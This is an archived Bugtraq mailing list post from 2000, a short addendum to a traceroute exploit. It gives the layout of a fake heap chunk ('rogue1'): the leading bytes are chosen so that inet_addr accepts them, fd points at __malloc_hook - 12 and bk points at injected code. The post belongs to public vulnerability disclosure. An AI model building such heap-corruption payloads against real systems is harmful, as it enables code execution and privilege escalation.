Bugtraq mailing list archives

Addendum: Traceroute exploit
From: pedward () WEBCOM COM
Date: Mon, 2 Oct 2000 22:25:45 -0700

I just saw Pavel's note and looked at glibc; inet_addr quits after finding
4 octets, so the first 8 bytes of rogue1 should look like:

"1.1."
"1.1 "

making rogue1 look like this in total:

prev_size = "1.1."
size      = "1.1 "
fd        = __malloc_hook - 12
bk        = 0x804cd7a + 0x20 (our rogue code)

That satisfies inet_addr to make "1.1.1.1" into an integer.

--Perry

--
Perry Harrington                 Director of                   zelur xuniL  ()
perry () webcom com             System Architecture               Think Blue.  /\

